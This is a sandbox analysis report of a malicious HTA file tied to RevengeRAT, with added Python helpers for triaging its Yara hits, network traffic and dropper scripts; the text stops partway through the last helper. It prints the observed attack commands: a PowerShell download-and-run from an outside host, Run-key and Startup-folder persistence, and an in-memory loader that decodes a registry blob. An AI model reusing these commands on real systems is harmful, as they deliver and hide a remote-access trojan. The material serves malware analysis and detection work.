
Analysis Report microsoft.hta

Overview

General Information

Joe Sandbox Version: 24.0.0 Fire Opal
Analysis ID: 84810
Start date: 17.10.2018
Start time: 21:12:12
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 3s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: microsoft.hta
Cookbook file name: default.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winHTA@49/18@2/3
EGA Information: Failed
HDC Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .hta
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview



AV Detection:

Antivirus detection for URL or domain
  • Source: http://pm2bitcoin.com:5000/is-ready; Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
  • Source: http://pm2bitcoin.com:5000/is-ready; virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
  • Source: microsoft.hta; virustotal: Detection: 10%
Yara signature match
  Matched rule: Molerats_Jul17_Sample_4 (date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/)
  Sources (type: MEMORY):
    • 00000005.00000003.1648661343.02828000.00000004.sdmp
    • 00000018.00000003.1783978911.00808000.00000004.sdmp
    • 00000005.00000003.1660564655.0282B000.00000004.sdmp
    • 00000024.00000003.1869485454.026C8000.00000004.sdmp
    • 00000017.00000003.1774350891.00C9D000.00000004.sdmp
    • 00000017.00000003.1777449971.00CC8000.00000004.sdmp
    • 00000024.00000003.1871686478.021B5000.00000004.sdmp
    • 00000005.00000003.1650450229.00CB8000.00000004.sdmp
    • 00000018.00000003.1777322636.024E9000.00000004.sdmp
    • 00000017.00000003.1814699090.028BB000.00000004.sdmp
    • 0000000A.00000003.1684455083.0071D000.00000004.sdmp
    • 00000017.00000003.1772877643.028B8000.00000004.sdmp
    • 00000018.00000003.1804762410.00809000.00000004.sdmp
    • 00000024.00000003.1870458103.021B5000.00000004.sdmp
    • 0000000A.00000003.1719040637.02669000.00000004.sdmp
    • 0000000A.00000003.1687366851.00748000.00000004.sdmp
    • 00000005.00000003.1668480739.00CB9000.00000004.sdmp
    • 00000017.00000003.1771537764.03221000.00000004.sdmp
    • 0000000A.00000003.1728354835.0074A000.00000004.sdmp
    • 0000000A.00000003.1682024502.03351000.00000004.sdmp
    • 00000024.00000003.1926941048.021BA000.00000004.sdmp
    • 00000024.00000003.1893158995.026CB000.00000004.sdmp
    • 00000018.00000003.1782023823.00808000.00000004.sdmp
    • 0000000A.00000003.1725530094.0074A000.00000004.sdmp
    • 00000018.00000003.1802081353.024EC000.00000004.sdmp
    • 00000005.00000003.1648294841.034E1000.00000004.sdmp
    • 00000005.00000003.1649176861.00C8D000.00000004.sdmp
    • 0000000A.00000003.1683144936.02666000.00000004.sdmp
    • 00000018.00000003.1775852566.03211000.00000004.sdmp
    • 00000024.00000003.1868087137.03221000.00000004.sdmp
    • 00000018.00000003.1803354178.00809000.00000004.sdmp
    • 00000017.00000003.1817762215.00CCA000.00000004.sdmp
  Matched rule: RevengeRAT_Sep17 (date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/)
  Sources (type: MEMORY):
    • 00000012.00000002.2097194001.043E0000.00000004.sdmp
    • 00000021.00000002.1929031849.01BFC000.00000004.sdmp
    • 00000021.00000002.1936492458.043A0000.00000004.sdmp
    • 00000012.00000002.2094413117.01AA0000.00000004.sdmp
    • 00000021.00000002.1915472775.01A00000.00000004.sdmp
  Sources (type: UNPACKEDPE):
    • 33.2.powershell.exe.43a0000.5.raw.unpack
    • 18.2.powershell.exe.43e0000.5.raw.unpack
    • 33.2.powershell.exe.43a0000.5.unpack
    • 18.2.powershell.exe.43e0000.5.unpack
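The Yara rows above are easier to act on when grouped by process: the RevengeRAT rule fires on unpacked PE images in two PowerShell processes, while the Molerats rule only matches strings in the memory of several others. The following script, added here as an example and not part of the Joe Sandbox report or its engine, parses the hit rows and produces that per-process view. The field layout it assumes for memory-dump identifiers (process id . dump type . timestamp . base address . page protection, all but the timestamp in hex) is inferred from the report itself rather than documented on this page: memory source 00000012.*.043E0000 lines up with unpacked-PE source 18.2.powershell.exe.43e0000.5, and 0x12 is 18. The sample rows are a constructed subset of the report's Yara section with the rule metadata trimmed.

```python
"""Group Joe Sandbox Yara hits by process so the families per process are visible.

Added example; not part of the Joe Sandbox report or its engine. Assumed layout of a
memory-dump identifier (inferred from the report, not documented here):
  <process id>.<dump type>.<timestamp>.<base address>.<page protection>.sdmp
with every field but the timestamp in hex.
"""
import re
from collections import defaultdict

# Constructed input: a subset of the report's Yara rows, rule metadata trimmed.
# The first row keeps the "MEMORYMatched" glue seen in the extracted report.
HITS = """\
Source: 00000005.00000003.1648661343.02828000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4
Source: 0000000A.00000003.1684455083.0071D000.00000004.sdmp, type: MEMORY Matched rule: Molerats_Jul17_Sample_4
Source: 00000012.00000002.2097194001.043E0000.00000004.sdmp, type: MEMORY Matched rule: RevengeRAT_Sep17
Source: 00000021.00000002.1929031849.01BFC000.00000004.sdmp, type: MEMORY Matched rule: RevengeRAT_Sep17
Source: 18.2.powershell.exe.43e0000.5.unpack, type: UNPACKEDPE Matched rule: RevengeRAT_Sep17
Source: 33.2.powershell.exe.43a0000.5.raw.unpack, type: UNPACKEDPE Matched rule: RevengeRAT_Sep17
"""

# Tolerates both "MEMORY Matched" and the glued "MEMORYMatched" form.
HIT_RE = re.compile(
    r"^Source: (?P<src>\S+), type: (?P<type>[A-Z]+)\s*Matched rule: (?P<rule>\w+)")
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<kind>[0-9A-Fa-f]{8})\.(?P<ts>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{8})\.(?P<prot>[0-9A-Fa-f]{8})\.sdmp$")
UNPACK_RE = re.compile(
    r"^(?P<pid>\d+)\.(?P<kind>\d+)\.(?P<image>.+?)\.(?P<base>[0-9A-Fa-f]+)"
    r"\.\d+(?:\.raw)?\.unpack$")


def parse_source(src):
    """Return (process id, base address, image name or None) for one hit source."""
    m = SDMP_RE.match(src)
    if m:
        return int(m["pid"], 16), int(m["base"], 16), None
    m = UNPACK_RE.match(src)
    if m:
        return int(m["pid"]), int(m["base"], 16), m["image"]
    raise ValueError(f"unrecognised source: {src!r}")


def group_hits(text):
    """Map process id -> rule -> sorted base addresses of the regions that matched."""
    grouped = defaultdict(lambda: defaultdict(set))
    for line in text.splitlines():
        m = HIT_RE.match(line)
        if not m:
            continue
        pid, base, _image = parse_source(m["src"])
        grouped[pid][m["rule"]].add(base)
    return {pid: {rule: sorted(bases) for rule, bases in rules.items()}
            for pid, rules in grouped.items()}


def triage(text):
    """Per process: families seen, and whether an unpacked PE matched (a stronger
    indicator of a live implant than a string sitting in memory)."""
    verdict = {}
    for line in text.splitlines():
        m = HIT_RE.match(line)
        if not m:
            continue
        pid, _base, image = parse_source(m["src"])
        entry = verdict.setdefault(pid, {"families": set(), "unpacked_pe": False, "image": None})
        entry["families"].add(m["rule"])
        if m["type"] == "UNPACKEDPE":
            entry["unpacked_pe"] = True
            entry["image"] = image
    return verdict


if __name__ == "__main__":
    for pid, info in sorted(triage(HITS).items()):
        tag = f"  [unpacked PE in {info['image']}]" if info["unpacked_pe"] else ""
        print(f"process {pid:>3}: {', '.join(sorted(info['families']))}{tag}")
```

Run against the full Yara section, this separates the two PowerShell processes carrying an unpacked RevengeRAT image (18 and 33) from the processes where only the Molerats strings were seen, which is the distinction an analyst needs before deciding which dumps to pull.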

Spreading:

Enumerates the file system
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user

Networking:

Detected TCP or UDP traffic on non-standard ports
  • Source: global traffic; TCP traffic: 192.168.2.3:49169 -> 194.5.98.10:5000
  • Source: global traffic; TCP traffic: 192.168.2.3:49174 -> 23.105.131.191:5478
Connects to IPs without corresponding DNS lookups
  • Source: unknown; TCP traffic detected without corresponding DNS query: 23.105.131.191 (50 identical entries)
Internet Provider seen in connection with other malware
  • Source: Joe Sandbox View; ASN Name: NOBIS-TECH-NobisTechnologyGroupLLCUS
  • Source: Joe Sandbox View; ASN Name: AS-26496-GO-DADDY-COM-LLC-GoDaddycomLLCUS
Found strings which match to known social media urls
  • Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp; String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
  • Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp; String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
  • Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp; String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookups
  • Source: unknown; DNS traffic detected: queries for: briargrove.org
Urls found in memory or binary data (String found in binary or memory)
  • Source: powershell.exe, 00000004.00000002.1681803025.04CF0000.00000004.sdmp: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
  • Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
  • Source: powershell.exe, 00000004.00000002.1681803025.04CF0000.00000004.sdmp: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
  • Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp: http://crl.entrust.net/2048ca.crl0
  • Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp: http://crl.entrust.net/server1.crl0
  • Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
  • Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
  • Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp: http://crl.securetrust.com/STCA.crl0
  • Source: powershell.exe, 00000004.00000002.1681803025.04CF0000.00000004.sdmp: http://ocsp.comodoca.com0
  • Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp: http://ocsp.comodoca.com0%
  • Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp: http://ocsp.comodoca.com0-
  • Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp: http://ocsp.comodoca.com0/
  • Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp: http://ocsp.comodoca.com05
  • Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp: http://ocsp.entrust.net03
  • Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp: http://ocsp.entrust.net0D
  • Source: wscript.exe, 00000006.00000002.2058881653.0033F000.00000004.sdmp: http://pm2bitcoin.com:5000/is-ready
  • Source: wscript.exe, 00000006.00000002.2058881653.0033F000.00000004.sdmp: http://pm2bitcoin.com:5000/is-readyS
  • Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp: http://www.digicert.com.my/cps.htm02
  • Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp: http://www.diginotar.nl/cps/pkioverheid0
  • Source: powershell.exe, 00000004.00000002.1654831029.01DD8000.00000004.sdmp: https://briargrove.org
  • Source: powershell.exe, 00000004.00000002.1654831029.01DD8000.00000004.sdmp: https://briargrove.org/microsoft
  • Source: powershell.exe, 00000004.00000002.1644143606.003E4000.00000004.sdmp; powershell.exe, 00000004.00000002.1654831029.01DD8000.00000004.sdmp; powershell.exe, 00000004.00000002.1652412654.01BB0000.00000004.sdmp; microsoft.hta: https://briargrove.org/microsoft.vbs
  • Source: powershell.exe, 00000004.00000002.1654831029.01DD8000.00000004.sdmp: https://briargrove.org/microsoft.vbst
  • Source: powershell.exe, 00000004.00000002.1669040705.02123000.00000004.sdmp: https://briargrove.orgx&
  • Source: powershell.exe, 00000004.00000002.1681803025.04CF0000.00000004.sdmp; powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp: https://secure.comodo.com/CPS0
Uses HTTPS
  • Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49168
  • Source: unknown; Network traffic detected: HTTP traffic on port 49168 -> 443
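Two of the networking signatures above, "Detected TCP or UDP traffic on non-standard ports" and "Connects to IPs without corresponding DNS lookups", are cheap to reproduce outside the sandbox from a flow log and a DNS log, and together they single out the hard-coded 23.105.131.191:5478 endpoint. The script below is an added example, not code from the Joe Sandbox report or its engine, showing both heuristics over constructed records. The analysis host 192.168.2.3 and the 23.105.131.191:5478 and :5000 endpoints come from the report; the names example-a.test / example-b.test and the 192.0.2.x / 198.51.100.x answers are RFC 5737 documentation values standing in for resolutions the report does not show. The local network range and the set of "standard" ports are assumptions a deployment would tune.

```python
"""Replay two Joe Sandbox networking heuristics over flow and DNS records:
"traffic on non-standard ports" and "connects to IPs without a DNS lookup".

Added example; not part of the Joe Sandbox report or its engine. All records below
are constructed; see the lead-in for which values are taken from the report.
"""
import ipaddress
from dataclasses import dataclass

# Assumption: ports a client in the sandbox is expected to talk to. Anything else is reported.
STANDARD_PORTS = {21, 22, 25, 53, 80, 110, 123, 143, 443, 465, 587, 993, 995}
# Assumption: the analysis network; traffic that stays inside it is not "external".
LOCAL_NETS = [ipaddress.ip_network("192.168.2.0/24")]


@dataclass(frozen=True)
class DnsAnswer:
    t: float        # seconds since analysis start
    name: str
    ip: str


@dataclass(frozen=True)
class Flow:
    t: float
    src: str
    sport: int
    dst: str
    dport: int


# Constructed DNS answers (documentation addresses, not real resolutions).
DNS = [
    DnsAnswer(1.0, "example-a.test", "192.0.2.10"),
    DnsAnswer(2.5, "example-b.test", "198.51.100.7"),
]

# Constructed flows; 23.105.131.191:5478 and the :5000 port are from the report.
FLOWS = [
    Flow(0.5, "192.168.2.3", 49160, "192.0.2.10", 443),       # answer arrives later: flagged
    Flow(2.0, "192.168.2.3", 49168, "192.0.2.10", 443),       # resolved, standard port: clean
    Flow(3.0, "192.168.2.3", 49169, "198.51.100.7", 5000),    # resolved, but odd port
    Flow(4.0, "192.168.2.3", 49174, "23.105.131.191", 5478),  # never resolved, odd port
    Flow(4.5, "192.168.2.3", 49175, "23.105.131.191", 5478),
    Flow(5.0, "192.168.2.3", 49176, "192.168.2.1", 53),       # local resolver: ignored
]


def _is_external(ip):
    a = ipaddress.ip_address(ip)
    if a.is_loopback or a.is_link_local or a.is_multicast:
        return False
    return not any(a in net for net in LOCAL_NETS)


def connects_without_dns(flows, answers):
    """Flows to external IPs that no DNS answer had returned before the flow started.
    Requiring the answer to precede the flow keeps a hard-coded address flagged even if
    the same IP happens to be resolved later for some unrelated name."""
    return [f for f in flows
            if _is_external(f.dst)
            and not any(a.ip == f.dst and a.t <= f.t for a in answers)]


def non_standard_ports(flows):
    """Flows whose destination port is outside the expected client set."""
    return [f for f in flows if f.dport not in STANDARD_PORTS]


def report(flows, answers):
    """Per destination: flows lacking a prior DNS answer, and the odd ports used."""
    out = {}

    def entry(ip):
        return out.setdefault(ip, {"no_dns": 0, "odd_ports": set()})

    for f in connects_without_dns(flows, answers):
        entry(f.dst)["no_dns"] += 1
    for f in non_standard_ports(flows):
        entry(f.dst)["odd_ports"].add(f.dport)
    return out


if __name__ == "__main__":
    for ip, info in sorted(report(FLOWS, DNS).items()):
        print(f"{ip:<16} no-DNS flows: {info['no_dns']}  odd ports: {sorted(info['odd_ports'])}")
```

A destination that trips both checks, as 23.105.131.191 does here, is the one to prioritise: a resolved name on an odd port may be a legitimate service, and an unresolved address on 443 may be a CDN pinned by IP, but an unresolved address on an unusual port is the classic shape of a hard-coded RAT controller.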

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities
  • Source: C:\Windows\System32\mshta.exe; Window created: window name: CLIPBRDWNDCLASS

System Summary:

Potential malicious VBS script found (suspicious strings)
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Dropped file: Set bs = CreateObject("ADODB.Stream")
  • Source: C:\Windows\System32\wscript.exe; Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM") (11 identical entries)
  • Source: C:\Windows\System32\wscript.exe; Dropped file: Set bs = CreateObject("ADODB.Stream") (10 identical entries)
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: Set bs = CreateObject("ADODB.Stream")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: Set bs = CreateObject("ADODB.Stream")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
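The two flagged lines are the halves of a well-known VBS idiom: an MSXML element with `dataType = "bin.base64"` decodes base64 through `nodeTypedValue`, and an `ADODB.Stream` of binary type writes the bytes to disk with `SaveToFile`. The following Python is an added triage helper, not part of this report or of the sample; the report shows only the two `CreateObject()` lines, so the VBS below is a constructed script in the usual shape of that idiom with a fake 8-byte payload, not the real `nUleFczcAh.vbs` or `microsoft.vbs`.

```python
"""What the Microsoft.XMLDOM + ADODB.Stream pair in a VBS dropper is for.

Added example, not part of the Joe Sandbox report. The report shows only the
two CreateObject() lines; the script below is a constructed sample in the usual
shape of that idiom (base64 text in an XML node, decoded through
nodeTypedValue, written to disk with ADODB.Stream.SaveToFile). It is not the
real nUleFczcAh.vbs / microsoft.vbs, whose body the report does not include.
"""
import base64
import re

# Constructed payload: just enough bytes to carry an MZ signature.
FAKE_PAYLOAD = b"MZ\x90\x00\x03\x00\x00\x00"

SAMPLE_VBS = r'''
Set XDMX = CreateObject("Microsoft.XMLDOM")
Set bs = CreateObject("ADODB.Stream")
Set el = XDMX.createElement("blob")
el.dataType = "bin.base64"
el.text = "__B64__"
bs.Type = 1
bs.Open
bs.Write el.nodeTypedValue
bs.SaveToFile "C:\Users\Public\update.exe", 2
'''.replace("__B64__", base64.b64encode(FAKE_PAYLOAD).decode())

# Each marker on its own is benign; together they are the classic
# "decode base64 and write a binary to disk" idiom that the signature flags.
DROPPER_MARKERS = ("Microsoft.XMLDOM", "bin.base64", "nodeTypedValue",
                   "ADODB.Stream", "SaveToFile")


def dropper_markers_present(vbs: str) -> list:
    """Case-insensitive check for the markers, in signature order."""
    low = vbs.lower()
    return [m for m in DROPPER_MARKERS if m.lower() in low]


def extract_dropped_payloads(vbs: str) -> list:
    """Pair each base64 literal assigned to .text with the SaveToFile target
    that follows it, decode it, and report the on-disk path and an MZ check."""
    literals = re.findall(r'\.text\s*=\s*"([A-Za-z0-9+/=]+)"', vbs)
    targets = re.findall(r'SaveToFile\s+"([^"]+)"', vbs, re.IGNORECASE)
    found = []
    for lit, target in zip(literals, targets):
        data = base64.b64decode(lit)
        found.append({"path": target, "size": len(data), "mz": data[:2] == b"MZ"})
    return found


if __name__ == "__main__":
    print("markers:", dropper_markers_present(SAMPLE_VBS))
    for item in extract_dropped_payloads(SAMPLE_VBS):
        print("drops", item["path"], item["size"], "bytes, MZ:", item["mz"])
```

Real droppers usually split the base64 literal across many `&`-concatenated string fragments and obfuscate the object names; this helper only handles a single literal, so treat an empty result on a file that still has all five markers as a reason to look harder, not as a clean bill.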
Powershell connects to network
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Network Connect: 23.105.131.191 5478
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Network Connect: 166.62.121.61 443
Wscript called in batch mode (suppresses errors)
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
(Reported 8 times with an unknown parent and 6 times with wscript.exe as the parent; two of the unknown-parent entries spell the image path 'C:\Windows\system32\wscript.exe'. Repeats collapsed.)
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;' (reported 3 times)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))' (reported 3 times)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);' (reported 2 times)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
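The command lines above describe the whole chain: `cmd.exe` downloads `microsoft.vbs` into `%temp%`, `wscript.exe` copies it to `%AppData%` and to the Startup folder (`GetFolderPath(7)` is `Environment.SpecialFolder.Startup`), registers it under `HKCU\...\CurrentVersion\Run`, and finally runs a loader that reads a hex string from the value `microsoft` under `HKCU\SOFTWARE\Microsoft` (a different key from the Run entry of the same name), turns every `@` back into `0`, parses byte pairs with `H2B`, and executes the result with `Assembly.Load` plus `EntryPoint.Invoke`, so the .NET payload never touches disk. The Python below is an added analyst helper, not code from this report or from the sample: it reverses that `replace('@','0')`/hex routine and sanity-checks the result for an MZ/PE header, and it flags the traits of the command lines seen here. The registry blob is a constructed fake header (the report does not include the real one), and the sample command lines are shortened copies of those listed above.

```python
"""Triage helpers for the HTA -> cmd -> PowerShell -> VBS -> PowerShell chain.

Added example, not part of the Joe Sandbox report. The sample command lines
are shortened from the ones in the report; the registry payload is a fake
minimal PE header, because the report does not include the real blob.
"""
import re
import struct

# --- 1. Reverse the loader's registry-to-bytes routine ---------------------
# The loader reads HKCU:\SOFTWARE\Microsoft value 'microsoft', does
# $_b.replace('@','0') and parses byte pairs as hex, then Assembly.Load()s
# the result. Writing '@' for '0' defeats naive "is this a hex blob?" checks.

def decode_registry_blob(blob: str) -> bytes:
    hex_str = blob.replace("@", "0")
    if len(hex_str) % 2 or not re.fullmatch(r"[0-9A-Fa-f]*", hex_str):
        raise ValueError("not even-length hex after '@' -> '0' substitution")
    return bytes.fromhex(hex_str)


def pe_header_info(data: bytes) -> dict:
    """Cheap MZ/PE sanity check before handing the blob to a real PE parser."""
    info = {"mz": data[:2] == b"MZ", "pe": False, "e_lfanew": None}
    if info["mz"] and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        info["e_lfanew"] = e_lfanew
        info["pe"] = data[e_lfanew:e_lfanew + 4] == b"PE\0\0"
    return info


def make_fake_blob() -> str:
    """Constructed stand-in payload: MZ stub, e_lfanew=0x40, 'PE\\0\\0' at 0x40,
    stored the way the loader expects (hex with every '0' written as '@')."""
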